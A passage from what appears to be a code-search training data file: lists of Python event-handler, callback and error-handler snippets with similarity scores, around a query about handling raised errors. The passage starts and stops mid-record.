\"RequestContext\") -> None:", "def handle_disablehandler(bot, ievent):\n if not httpd:\n ievent.reply('webserver is not running')\n return\n try:\n handler = ievent.args[0]\n except IndexError:\n ievent.missing('<handler>')\n return\n try:\n del httpd.handlers[handler]\n if handler in cfg.get('showplugs'):\n cfg.remove('showplugs', handler)\n if handler not in cfg.get('denyplugs'):\n cfg.append('denyplugs', handler)\n ievent.reply('%s handler disabled' % handler)\n except KeyError:\n ievent.reply('%s handler is not enabled' % handler)", "def event_handler(self, response):\n pass", "def _nothing(): # pylint: disable=useless-return\n logger.debug(\"Popping Nothing browser\")\n return", "def _dummy_callback():\n assert False, \"TRESPASS - set_callback() must be called\"", "def response(self, context, message):\r\n return True", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if not kwargs[\"raw\"]:\n signal_handler(*args, **kwargs)\n\n return wrapper", "def _handle(self, *args, **options):\n return super()._handle(*args, **options)", "def handle_uncaught_event(self, event):\r\n if self.get_visible():\r\n for i in self.widgets:\r\n if i.get_visible():\r\n if i.handle_uncaught_event(event):\r\n return True\r\n return False", "def ok_callback(self):\n pass", "def post_stop(self):", "def __empty_event_handler(self, govee, device, raw_data):\n\n pass", "def do_exit(self, _):\n return True", "def _disable(self):\n self.debug_log(\"Disabling...\")\n self._unregister_handlers()", "def handler(self):\n\t\tself.exitClient()", "def unhandled(self, *args):\n if self._context_response:\n # we asked a context-aware plugin to deal with the message, but it\n # did not\n self._context_dealt_with = False\n else:\n self.dec_handlers()", "def handle(self):", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if kwargs.get('raw', None):\n return\n signal_handler(*args, **kwargs)\n return wrapper", "def prepost_hook_with_wrong_return_annotation(self) -> bool:\n pass", "def off_hook(self) -> None:", "def handle_err(self):\n pass", "def _signal_handler(*args):\n self._user_exit = True", "def handle_once(self):\n return self.__handle_once", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if kwargs.get('raw'):\n return\n signal_handler(*args, **kwargs)\n\n return wrapper", "def callback(self):\n pass # pragma: no cover", "def on_exception(self):\n pass", "def cancel_callback(self):\n pass", "def on_cancel(self) -> None:\n pass", "def on_cancel(self) -> None:\n pass", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if 'raw' in kwargs and kwargs['raw']:\n return\n signal_handler(*args, **kwargs)\n return wrapper", "def onDone(self):\n pass", "async def _response_handler(self):", "def handler(signum, frame):\n logging.warning(\"Got a {} signal. Doing nothing\".format(signum))", "def process_IN_CLOSE_NOWRITE(self, event):", "def disable_cmd_ended_cb(self, event):\n this_server = TangoServerHelper.get_instance()\n if event.err:\n log_msg = (\n f\"{const.ERR_INVOKING_CMD}{event.cmd_name}\\n{event.errors}\"\n )\n self.logger.error(log_msg)\n this_server.write_attr(\"activityMessage\", log_msg, False)\n else:\n log_msg = f\"{const.STR_COMMAND}{event.cmd_name}{const.STR_INVOKE_SUCCESS}\"\n self.logger.info(log_msg)\n this_server.write_attr(\"activityMessage\", log_msg, False)", "def done(self):\n return False", "def interrupt(self):\n return True", "def handle_close(self):\r\n self._connection_state = STATE_DISCONNECTED\r\n super(http_evented, self).handle_close()\r\n self._fail_all_pending_event_handlers()\r\n call_if_not_none_and_callable(self._onClose)", "def _audio_finished_handler(self):\n # Indicate that no audio is playing. \n self.audio_finished_event.set()\n self.player = None", "def _stop(self):\n return True", "def aborting(self):\n \n pass", "def disable(self) -> None:", "def lost(self):\r\n return None", "def rnfr_handler(self):\n if self.is_rnfr:\n pass # TODO delete value in is_rnfr\n self.is_rnfr = None", "def is_done():\n return False", "def disable(self):", "def signal_handler(self, signal_number, frame):\n sys.exit(0)", "def handle_event(self, event):\n pass", "def default_handler(signum: int, frame: Any, spinner: Yaspin) -> None: # pylint: disable=unused-argument\n spinner.fail()\n spinner.stop()\n sys.exit(0)", "def error_handler(self, handler):\n if not self.opened():\n handler = handler or util.noop\n self._error_handler = enums.JLinkFunctions.LOG_PROTOTYPE(handler)\n self._dll.JLINKARM_SetErrorOutHandler(self._error_handler)", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def __signalHandler(self, signalNumber, frame):\n self._loop = False", "def handle_expt(self):\r\n self._perform_on_error_handling()", "def unknown_event(self, event):\r\n pass", "def no_response(self):\n raise NotImplementedError", "def signal_handler(self, signum, frame):\n self._running = False", "def handle(self, data):\n pass", "def PostExecute(self):\n return True", "def on_response(self, response):\n pass", "def notEnabledDummy(self, ev):\n pass", "def handler(signum, frame):\n global keep_running\n keep_running = False", "def handler(signum, frame):\n global keep_running\n keep_running = False", "def dummy_method_silent(self):\n\n pass", "def handle_other(self):\n pass" ]
[ "0.72471005", "0.70438576", "0.690345", "0.6730309", "0.65689135", "0.65600246", "0.65534455", "0.6529977", "0.64647585", "0.62942225", "0.6265559", "0.62107646", "0.61744297", "0.614441", "0.61417645", "0.61417645", "0.6119187", "0.6103069", "0.6037326", "0.59561646", "0.5919832", "0.5913491", "0.5911413", "0.59048307", "0.58844966", "0.5882942", "0.585671", "0.5841731", "0.5840626", "0.5827266", "0.5804793", "0.58042383", "0.58001673", "0.57939774", "0.5793744", "0.57924044", "0.577767", "0.57768714", "0.5760614", "0.575869", "0.57515544", "0.57242525", "0.57241493", "0.57074535", "0.57010806", "0.5696107", "0.56929773", "0.5691519", "0.5691519", "0.5687981", "0.5683032", "0.5682441", "0.56810486", "0.56775445", "0.56758475", "0.56730187", "0.56636035", "0.56475353", "0.56425107", "0.56391734", "0.5634981", "0.5632374", "0.5616342", "0.5615682", "0.56123054", "0.560759", "0.5605202", "0.56046134", "0.5602114", "0.55868715", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.5581849", "0.5559677", "0.5555527", "0.5549133", "0.5547418", "0.5546366", "0.5542142", "0.5539126", "0.55370027", "0.553652", "0.553652", "0.5534999", "0.55308855" ]
0.5970655
19
Called when handler raises an error
def on_exception(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def error(self, handler):\n pass", "def handle_err(self):\n pass", "def error_received(self, exc):\n print('Error received:', exc)", "def handle_expt(self):\r\n self._perform_on_error_handling()", "def _call_error_handler(self, event, err, **kwargs):\n if self._on_error_handler:\n event.error = str(err)\n event.origin_state = self.fullname\n return self._on_error_handler(event)", "def handle_error(self, request_handler, client_address):\n logger.debug('handle_error(%s:%s)' % client_address)", "def error(self, error):\n pass", "def handle_exception(e):\n print(e)\n return error()", "def handler(self, exctype, value, traceback):\n\n message = 'error occurred({}) in {}:{}'.format(value, traceback.tb_frame.f_code.co_filename, traceback.tb_lineno)\n self.errorSignal.emit()\n self.logger.critical('Unhandled exception: {}'.format(message))", "def on_error(self, callback):\n self.error_callback = callback", "def error_handler(self, error, *args, **kwargs):\n extras = []\n if args:\n extras.append(\"args={}\".format(args))\n if kwargs:\n extras.append(\"kwargs={}\".format(kwargs))\n if extras:\n msg = \"Handler (called with {}) raised error: {}\".format(\n \", \".join(extras), error)\n else:\n msg = \"Handler raised error: {}\".format(error)\n self.log_exception(msg)", "def exception_handler(self, exception):\n pass", "def on_error(self, status_code, data):\n\t\tprint(\"error_code: \",status_code)", "def error(self, func):\n self.error_handler = func\n return func", "def error(self, *args, **kwargs):", "def handle_error(self, request, error):\n self.log.error(\"An error occurred at request \" + repr(request) + \": \" + repr(error))", "def error_handler(self, e, name, handler):\n msg = '' if handler else ' (no handler)'\n LOGGER.debug('Monitoring error handling %s %s: %s', name, msg, e)\n if handler:\n try:\n handler(e)\n except Exception as handler_exception:\n LOGGER.error('Monitoring exception %s fail: %s', name, handler_exception)\n LOGGER.exception(handler_exception)\n else:\n LOGGER.exception(e)", "def error(self):\n ...", "def _set_error_handler(self):\n if self.on_error:\n error_step = self.context.root.path_to_step(self.on_error)\n self._on_error_handler = error_step.run", "def error_handler(self, view):\n self._error_response = view\n return view", "def internal_error_handler(error):\r\n return render_template('error.500.html')", "def _on_error(self, error):\n print(error + \" for \" + self.session_name)", "def error(self):\n pass", "def _raise_http_error(self, *args, **kwargs):", "def OnError(self, error):\r\n\t\tLogErr(error)\r\n#\t\tself.Shutdown()\r\n\t\tself.onError()", "def unexpected_error(self, exception):", "def _error_handling(self,e,func):\n print(self.type, \" sufferred exception in \" , func , \":\" , e)", "def error(self, msg, *args, **kwargs):\n pass", "def error_handler(e):\n logging.error('error_handler for socketio. An error has occurred: ' + str(e))", "def on_request_error(locust_instance, exception, tb, **kwargs):", "def error_handler(self):\n return self._error_handler", "def handle_error(self):\n self.cmd_channel.debug(\"DTPHandler.handle_error()\")\n try:\n raise\n # if error is connection related we provide a detailed\n # information about it\n except socket.error, err:\n if err[0] in errno.errorcode:\n error = err[1]\n else:\n error = \"Unknown connection error\"\n # an error could occur in case we fail reading / writing\n # from / to file (e.g. file system gets full)\n except EnvironmentError, err:\n error = _strerror(err)\n except:\n # some other exception occurred; we don't want to provide\n # confidential error messages to user so we return a\n # generic \"unknown error\" response.\n logerror(traceback.format_exc()) \n error = \"Unknown error\"\n self.cmd_channel.respond(\"426 %s; transfer aborted.\" %error)\n self.close()", "def _raise_performing_request_error(self, *args, **kwargs):", "def handle_error(self, params):\n\n # Run the error handler if needed.\n if (self.must_handle_error()):\n log.warning(\"Running On Error error handler...\")\n self.got_error = False\n self.error_handler.eval(context=self, params=params)\n\n # The error has now been cleared.\n self.got_error = False", "def error_handler(self, handler):\n if not self.opened():\n handler = handler or util.noop\n self._error_handler = enums.JLinkFunctions.LOG_PROTOTYPE(handler)\n self._dll.JLINKARM_SetErrorOutHandler(self._error_handler)", "def on_processing_error(self, event, context, exc):\n pass", "def error(session_id, context, e):\n pass", "def add_error_event(self, obj, event, *args):\n\t\thid = obj.connect(event, self._err_emited, *args)\t\n\t\tself.handlers_id.append(hid)", "def handle_error(self, data, **kwargs):\n logger.log_err(str(data))", "def error_handler(msg):\n print(\"Server Error: %s\" % msg)", "def error_handler(self, failure):\n log.error(failure)", "def error(self, flow: mitmproxy.http.HTTPFlow):", "def error_handler(num, err):\n print(\"Error in input {}\".format(num))\n err = err.decode()\n raise Exception(err)", "def sm_error_handler(self, errors):\n try:\n yield\n except Exception as e:\n if issubclass(e.__class__, ManagerError) or \\\n issubclass(e.__class__, ManagerFatalError) or \\\n isinstance(e, ConnectionError) or \\\n xmlrpclib.ProtocolError or \\\n xmlrpclib.Fault:\n\n errors.append(repr(e))\n elif isinstance(e, socket.error):\n errors.append(repr(e))\n errors.append(\"Please make sure the server port is open.\")\n else:\n raise e", "def error_handler(msg):\n print \"Server Error: %s\" % msg", "def error_handler(msg):\n print \"Server Error: %s\" % msg", "def _handle_error(self, errno, msg):\n if self.error_callback != None:\n #Call the error callback but expect failure.\n try:\n self.error_callback(errno, msg, self.rpcclient)\n except Exception as ex:\n self.log.failure(\"Error in error handler for '{cmd!r}'.\",cmd=self.command)\n else:\n #If no handler is set, all we do is log.\n self.log.error(\"Notice: no on_error defined for '{cmd!r}, command result: {msg!r}\",cmd=self.command,msg=msg)", "def on_error(self, exception):\n traceback.print_exc()", "def handle_error(self):\n self.cmd_channel.debug(\"ActiveDTP.handle_error()\")\n logerror(traceback.format_exc())\n self.close()", "def init_error_handler(app):\n app.register_error_handler(Exception, global_handler)\n return app", "def indicate_error(self):\n pass", "def _default_error_handler(self, exception):\n\n self.log.error(exception)\n return '', 500", "def error(self, flow: mitmproxy.http.HTTPFlow):\n pass", "def error(self, flow: mitmproxy.http.HTTPFlow):\n pass", "def process_error(self, id, code, error):\n raise NotImplementedError('process_error not implemented in BaseService')", "def handle_error(self):\n debug(\"FTPServer.handle_error()\")\n logerror(traceback.format_exc())\n self.close()", "def on_request_error(self, status_code):\n log.error(\"Stream encountered HTTP error: %d\", status_code)", "def handle_error(self, request, client_address):\n\t\tprint '-'*40\n\t\tprint 'Exception happened during processing of request from',\n\t\tprint client_address\n\t\timport traceback\n\t\ttraceback.print_exc() # XXX But this goes to stderr!\n\t\tprint '-'*40", "def error(self):\n return self._decorator_wrapper(EventName.error)", "def error(self, func):\r\n if not asyncio.iscoroutinefunction(func):\r\n raise TypeError(\"The local error handler must be an async function\")\r\n self._error_handler = func\r\n return func", "def handle_error(self, api, command):\n return self.handle_log(api, command, level=logging.ERROR)", "def handle_error():\n print \"An error occurred. Trace:\\n\"\n traceback.print_exc()", "def _call_error_handler(self, handle_error, confidence):\n handle_error(line_number=100,\n category=self._category,\n confidence=confidence,\n message=\"message\")", "def serious_error(self, e):\n pass", "def on_failure(self, exc: BaseException) -> None:", "def _on_exception(self, exception):\n pass", "def onError(self, error):\n log.err(\"Encountered an error: {0}\".format(\n error.getErrorMessage()))\n return error", "def on_error(ws, error):\n logging.error(\"Error:-\", error)", "def error(ctx, flow):\n ctx.log(\"error\")", "def on_error(self, event: ThreadResult):\n if self._on_error is not None:\n self._on_error(event.data)", "def error(self, tag, message, exc_info=False):\n \n self.log(logging.error,tag, message, exc_info)", "def handle_error(self, error):\n html = error.response.content\n raise SystemExit(\"API Error:\\n %s\" %\n \"\\n \".join(html.itertext()))", "def _handle_error(cls, e, request):\r\n if e.check(InvalidRequest):\r\n msg = e.getErrorMessage()\r\n code = httpstatus.HTTP_STATUS_CODE_BAD_REQUEST[0]\r\n else:\r\n e.printTraceback()\r\n msg = 'Fatal Error'\r\n code = httpstatus.HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0]\r\n\r\n cls._render(request, code, 'text/plain; charset=utf-8', msg)", "def handle_exception(error):\n return make_response(jsonify({'message': error.description}), 400)", "def __empty_error_event_handler(self, govee, device, message, exception):\n\n pass", "def on_error(data):\n print('Market Data Error', data)", "def raise_on_error(self):\n if not self._status.success:\n cls = UrlApi.InfraHTTPError if self._infra_step else UrlApi.HTTPError\n raise cls('HTTP status (%d)' % (self.status_code,), self)", "def error_handler(response, **kwargs):\n if 400 <= response.status_code <= 499:\n message = response.json()['error_description'] \\\n if 'error_description' in response.json() \\\n else response.json()['error_detail']\n raise ClientError(response, message)\n\n elif 500 <= response.status_code <= 599:\n raise ServerError(response)\n\n return response", "def error(self, *args):\n\n if self.is_on(_Log.ERROR):\n self._write(self._err, *args)", "def error(self, *args, **kwargs):\n\n message = self.get_message(*args, **kwargs)\n self.logger.error(message)", "def getErrorHandler(self):\n pass", "def _handle_error(self, failure, item, spider):\n # do nothing, just log\n log.err(failure)", "def handle_error(error):\n return render_template('errors/{}.html'.format(error.code)), error.code", "async def on_handle_message_error(self, message: andesite.ReceiveOperation, exc: Exception) -> None:\n log.error(f\"uncaught error {exc} in {self} when handling message {message}\")", "async def on_error(self, event: str, error: Exception, *args, **kwargs):\n print(f\"Ignoring exception in {event}\", file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__, file=sys.stderr)", "def after_error_request(self, f):\n self.after_error_request_handlers.append(f)\n return f", "def _on_error(self, type, value, tb):\n \n # get exception\n exception = traceback.format_exception(type, value, tb)\n exception = '\\n'.join(exception)\n \n # show error message\n dlg = ErrorDlg(self, exception)\n dlg.ShowModal()\n dlg.Destroy()", "def _err(self, *args):\n logger.error(*args)\n exit(1)", "def catch_error(self, eid):\n\n if eid not in (5, 301):\n logger.error('Error %d: %s (%s)' % (eid, NETWORK_ERROR.get(eid, 'unknown error'),\n self.sender().url().toString()))", "def handle_error(self):\n self.cmd_channel.debug(\"PassiveDTP.handle_error()\")\n logerror(traceback.format_exc())\n self.close()", "async def on_error(ctx, error):\n await send_block(\n ctx,\n \"\".join(\n traceback.format_exception(\n etype=type(error), value=error, tb=error.__traceback__\n )\n ),\n )", "def set_error_handler(self,error_handler):\n\t\tif(callable(error_handler)):\n\t\t\tself.error_handler = error_handler\n\t\telse:\n\t\t\traise NotCallableException(\"{} object is not callable\".format(type(error_handler)))", "def _on_server_error(server, *_):\n exception = sys.exc_info()[1]\n if isinstance(exception, ConnectionError):\n # These are expected errors when the browser closes the connection.\n return\n # Other errors would be unexpected, so print them.\n traceback.print_exc()", "def on_failure(self):\n pass", "def error ( self , message , *args , **kwargs ) :\n return self.logger.error ( message , *args , **kwargs )", "def _error(msg):\n\n error(None, msg)", "def not_found_error_handler(error):\r\n return render_template('error.404.html')", "def _handle_error(self, exc: BaseException, reraise: bool = True) -> None:\n if self._breaker.is_system_error(exc):\n self._breaker._inc_counter()\n for listener in self._breaker.listeners:\n listener.failure(self._breaker, exc)\n self.on_failure(exc)\n else:\n self._handle_success()\n\n if reraise:\n raise exc", "def _errorRedirection(self, ex):\n self._errorRaisedNotifier.notify(ex)\n\n self._mustBeAborted = True", "def error():\n return None" ]
[ "0.8809893", "0.7991302", "0.7537642", "0.7489565", "0.74614865", "0.7459694", "0.74516124", "0.74178", "0.7346542", "0.7311401", "0.73027474", "0.7302706", "0.72894347", "0.72691995", "0.72537273", "0.72459257", "0.72391665", "0.7171314", "0.7167411", "0.7127044", "0.7114514", "0.71075606", "0.70406294", "0.70352125", "0.7018041", "0.7008118", "0.70021147", "0.6987824", "0.6967485", "0.696639", "0.69624174", "0.6953463", "0.6948087", "0.6943106", "0.69414735", "0.691097", "0.6898141", "0.6891603", "0.6889701", "0.6870068", "0.6862695", "0.68597424", "0.6858077", "0.68567955", "0.6853662", "0.6853662", "0.6848625", "0.6841722", "0.6835778", "0.6828958", "0.6823308", "0.6798", "0.6797275", "0.6797275", "0.6790925", "0.6773277", "0.67347497", "0.67277735", "0.67186177", "0.6706165", "0.6706165", "0.66939294", "0.6673175", "0.66682684", "0.66655296", "0.6663148", "0.6661631", "0.665874", "0.6652718", "0.6648257", "0.6646493", "0.66366273", "0.66334444", "0.6611385", "0.6604501", "0.66019225", "0.65950817", "0.6595069", "0.65939784", "0.65919244", "0.65905493", "0.6581378", "0.65810037", "0.6562909", "0.65572757", "0.65522736", "0.6539245", "0.6534405", "0.6529138", "0.6528292", "0.65244985", "0.6520816", "0.65163946", "0.6515357", "0.65109843", "0.64980066", "0.6497903", "0.6493083", "0.649307", "0.64896953" ]
0.7198904
17
Called by scheduler to get next run time
def get_schedule(self, status): if status == self.S_LATE and self.delay_interval: return (datetime.datetime.now() + datetime.timedelta( seconds=random.random() * self.delay_interval)) return None # Remove schedule on complete
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_run_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"next_run_time\")", "def next_run_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"next_run_time\")", "def get_curr_exec_time(self):\n if self.type == 'normal':\n try:\n self.curr_exec_time = self.my_rand.gauss(self.runtime, self.stddev)\n except:\n if self.fwk.debug:\n print(\"not varying the execution time\")\n self.curr_exec_time = self.runtime\n raise\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n elif self.type == 'sandia_work':\n # this is a sandia style work task\n next_ckpt = self.sim.next_ckpt # relative work time\n work_todo = self.sim.total_work - self.sim.completed_work\n self.curr_exec_time = min(work_todo, next_ckpt)\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n elif self.type == 'sandia_rework':\n next_ckpt = self.sim.next_ckpt # relative work time\n self.curr_exec_time = min(self.sim.rework_todo, next_ckpt)\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n elif self.type == 'sandia_ckpt' or self.type == 'sandia_restart':\n self.curr_exec_time = self.runtime\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n else:\n print('error error error!!! problem with component type in get_curr_exec_time')\n raise", "def get_next_run_time(period, inst):\n period_sec = int(period)\n now = round(time.time())\n # Dry run mode.\n if dry_run is True:\n print(\"Running in {} secs\".format(now%period_sec))\n return (now%period_sec)\n\n\n # Number of secs that has elapsed since mkt open.\n secs_since_mkt_open = now - Instrument_CP.seconds_since_epoch_at_mkt_open[inst.tsb]\n\n \"\"\"\n If we started before market open, schedule at market_open + period\n Note: We pass the number of seconds from now.\n \"\"\"\n\n if (get_secs_to_mkt_close(inst.xch) < 0):\n logging.debug(\"sec to mkt close %d\" % (get_secs_to_mkt_close(inst.xch)))\n logging.debug(\"market closed\")\n return 0\n\n if secs_since_mkt_open < 0:\n logging.debug(\"market will open in %d\" % secs_since_mkt_open)\n return (-(secs_since_mkt_open))\n else:\n # Period in secs.\n logging.debug(\"next tun time %d\" % (period_sec - secs_since_mkt_open%period_sec))\n return ((period_sec - secs_since_mkt_open%period_sec) + 1)", "def start_time(self) -> float:\r\n ...", "def schedule(self):\n\n crontab = self._crontab\n return datetime.now() + timedelta(\n seconds=math.ceil(\n crontab.next(default_utc=False)\n )\n )", "def start_time(self):\n pass", "def _next_request_ts(self):\n\n self._logger.debug(\"PrototypeServer._next_request_ts()\")\n\n # set if not already contained in config\n if self._config.get('inter_request_not_pause', False):\n self._config['inter_request_not_pause'] = True\n else:\n self._config['inter_request_not_pause'] = False\n\n if self._config['inter_request_not_pause']:\n self._logger.debug(\"Using old request timestamp as starting point\")\n t_ref = self._next_request\n self._logger.debug(\"Using time.time() as starting point\")\n else:\n t_ref = time.time()\n\n # Constant time between requests\n if self._config['request_mode'] == 'constant':\n req_ts = t_ref + self._config['request_interval']\n # Exponential distributed time between the requests\n elif self._config['request_mode'] == 'exponential':\n req_ts = t_ref + np.random.exponential(self._config['request_interval'])\n else:\n raise Exception(\"Unknown request mode %s\" % self._config['request_mode'])\n\n self._logger.debug(\"next_request_ts(): mode: %s, interval: %.1f, rel_ts: %.3fs, inter_request_not_pause %s\" %\n (self._config['request_mode'], self._config['request_interval'], req_ts - time.time(), self._config['inter_request_not_pause']))\n\n return req_ts", "def next_schedule(self) -> datetime:\n return next(self._interval)", "def __get_starting_time(self):\n return self.__starting_time", "def _get_timebase(self):\n return clock()", "def _get_timebase(self):\n return clock()", "def _run_time(func):\n start_time = datetime.datetime.now()\n func\n end_time = datetime.datetime.now()\n return end_time - start_time", "def getSubmitTime():", "def update(self):\r\n \r\n self.time_to_next_fire = self.generate_fire_recurrence()\r\n return self.time_to_next_fire", "async def get_now_ts(self) -> int:\n return await self.AD.sched.get_now_ts()", "def _get_next_time(self, curr_time):\n return curr_time + self.time_dist.random()", "def time_run(self):\n if self._time_run is None:\n self._time_run = datetime.now(timezone.utc)\n return self._time_run.isoformat()", "def _sched_next(self):\n now = time()\n\n # Check if samples have been met\n if self._samples is not None:\n if self._runs_passed >= self._samples:\n log.info(\n 'Pipeline {} collected {} samples successfully in {}. '\n '{} executions failed, {} executions missed. '\n 'Exiting...'.format(\n self._pipeline.name,\n self._runs_passed,\n str(timedelta(seconds=now - self._start)),\n self._runs_failed,\n self._runs_missed,\n )\n )\n return\n\n # If not, continue scheduling samples\n next_time = self._last_run + self._frequency\n\n # Check no ticks were missing, if next_time is in the past\n if next_time <= now:\n self._runs_missed += 1\n\n log.info(\n 'Next run missed. Starting {} pipeline immediately ...'.format(\n self._pipeline.name\n )\n )\n event = self._scheduler.enter(\n 0, 1, self._sched_work\n )\n\n else:\n log.info('Scheduling next pipeline run in {} ...'.format(\n str(timedelta(seconds=next_time - now)),\n ))\n event = self._scheduler.enterabs(\n next_time, 1, self._sched_work\n )\n\n self._last_run = event.time", "def seconds_before_next_run(self):\n period, last_start_time = self.period, self.last_start_time\n now = utcnow()\n if isinstance(period, Weekly):\n then = now.replace(hour=period.hour, minute=10, second=0, microsecond=0)\n days = (period.weekday - now.isoweekday()) % 7\n if days:\n then += timedelta(days=days)\n if (last_start_time or EPOCH) >= then:\n then += timedelta(days=7)\n elif isinstance(period, Daily):\n then = now.replace(hour=period.hour, minute=5, second=0, microsecond=0)\n if (last_start_time or EPOCH) >= then:\n then += timedelta(days=1)\n elif period == 'irregular':\n return 0 if self.thread and self.thread.is_alive() else None\n elif last_start_time:\n then = last_start_time + timedelta(seconds=period)\n else:\n then = now\n return (then - now).total_seconds()", "def next(self):\n\n crontab = self._crontab\n return math.ceil(crontab.next(default_utc=False))", "def get_running_time(self):\n with open(self.running_time_file, 'r') as file:\n return int(file.read().strip())", "def cpu_time(self):", "def update(self):\n\n self.time_to_next_fire = self.generate_fire_recurrence()\n return self.time_to_next_fire", "def find_next_run_time(self, cron_hour, cron_minute, current_hour,\n current_minute, hour_delta, minute_delta):\n NOW = 0\n LAST_HOUR_OF_DAY = 23\n EVERY_MINUTE = u'*'\n EVERY_HOUR = u'*'\n CURRENT_DAY = u'today'\n NEXT_DAY = u'tomorrow'\n\n if cron_minute == EVERY_MINUTE and cron_hour == EVERY_HOUR:\n # Should run every minute of every hour in a day\n next_run_minute = current_minute\n next_run_hour = current_hour\n next_run_day = CURRENT_DAY\n\n elif cron_hour == EVERY_HOUR:\n # Minute is set but should run every hour of a day\n # Cron run time has passed\n if minute_delta < NOW:\n # Check for time going into next day (after 23:00)\n if current_hour != LAST_HOUR_OF_DAY:\n next_run_hour = current_hour + 1\n next_run_day = CURRENT_DAY\n else:\n next_run_hour = NOW\n next_run_day = NEXT_DAY\n else:\n next_run_hour = current_hour\n next_run_day = CURRENT_DAY\n\n next_run_minute = cron_minute\n\n elif cron_minute == EVERY_MINUTE:\n # Hour is set but should run every minute of that hour\n # Cron run time has passed\n if hour_delta < NOW:\n next_run_minute = NOW\n next_run_day = NEXT_DAY\n elif hour_delta == NOW:\n next_run_minute = current_minute\n next_run_day = CURRENT_DAY\n else:\n next_run_minute = NOW\n next_run_day = CURRENT_DAY\n\n next_run_hour = cron_hour\n\n else:\n # Both Hour and minute are specified and should only run then\n # Cron run time has passed\n if hour_delta < NOW:\n next_run_day = NEXT_DAY\n elif hour_delta == NOW:\n if minute_delta < NOW:\n next_run_day = NEXT_DAY\n else:\n next_run_day = CURRENT_DAY\n else:\n next_run_day = CURRENT_DAY\n\n next_run_minute = cron_minute\n next_run_hour = cron_hour\n\n # Convenient structure\n next_run_time = {\n u'day': next_run_day,\n u'hour': next_run_hour,\n u'minute': next_run_minute\n }\n\n return next_run_time", "def get(self):\n if self.running:\n return self.accumulated_time + pg.time.get_ticks() - self.start_time\n else:\n return self.accumulated_time", "def _time(self):\n return time()", "def set_next_order_arrival_time():\n if global_settings.demand_distribution == \"uniform\":\n # Update the time_of_next_order_arrival to a random time within the interval specified in global_settings\n global_settings.time_of_next_order_arrival = \\\n global_settings.current_time + round(random.uniform(\n global_settings.next_order_arrival_lower_bound,\n global_settings.next_order_arrival_upper_bound))\n elif global_settings.demand_distribution == \"exponential\":\n # Update the time_of_next_order_arrival to a random time from an exponential distribution\n random_exponential_number = \\\n get_random_exponential_number(global_settings.next_order_arrival_exponential_rate_parameter)\n if random_exponential_number == 0:\n random_exponential_number = 1\n global_settings.time_of_next_order_arrival = global_settings.current_time + random_exponential_number\n # print(\"time to next order:\" + str(random_exponential_number))\n else:\n raise ValueError(\"global_settings.demand_distribution invalid value assigned. \"\n \"Must be 'exponential' or 'uniform'\")\n return", "async def time(self) -> dt.time:\n now = await self.AD.sched.get_now()\n return now.astimezone(self.AD.tz).time()", "def wall_time(self):", "def internal_timestep(self):\n try:\n return self._internal_dt\n except AttributeError:\n # the component hasn't started running yet\n _ = self.calc_grads_and_timesteps(False, False)\n return self._internal_dt", "def get_time(self):\n\t\treturn time.time()", "def get_attempt_start_time():\n pass", "def next_run(self):\n self.load_run(run=self.run+1)", "def time(self):\r\n raise NotImplementedError", "def schedule_time(self) -> str:\n return pulumi.get(self, \"schedule_time\")", "def _compute_next_update(self):\n self.next_update = datetime.now() + timedelta(seconds=self.min_interval)", "def check(self):\r\n boto.log.info('checking Task[%s]-now=%s, last=%s' % (self.name, self.now, self.last_executed))\r\n\r\n if self.hourly and not self.last_executed:\r\n return 0\r\n \r\n if self.daily and not self.last_executed:\r\n if int(self.hour) == self.now.hour:\r\n return 0\r\n else:\r\n return max( (int(self.hour)-self.now.hour), (self.now.hour-int(self.hour)) )*60*60\r\n\r\n delta = self.now - self.last_executed\r\n if self.hourly:\r\n if delta.seconds >= 60*60:\r\n return 0\r\n else:\r\n return 60*60 - delta.seconds\r\n else:\r\n if int(self.hour) == self.now.hour:\r\n if delta.days >= 1:\r\n return 0\r\n else:\r\n return 82800 # 23 hours, just to be safe\r\n else:\r\n return max( (int(self.hour)-self.now.hour), (self.now.hour-int(self.hour)) )*60*60", "def t(self):\n return self._data_writer.get_current_run_time_ms()", "def test_run_is_next_run(curent_time, state):\n date = datetime(2020,5,5,12,0)\n duration_in_minutes = 65\n run = Run(date, duration_in_minutes/60)\n\n assert run.is_next_run(curent_time) == state", "def sys_time(self):\n timestamp = None\n for i in range(10):\n while timestamp is None:\n timestamp = 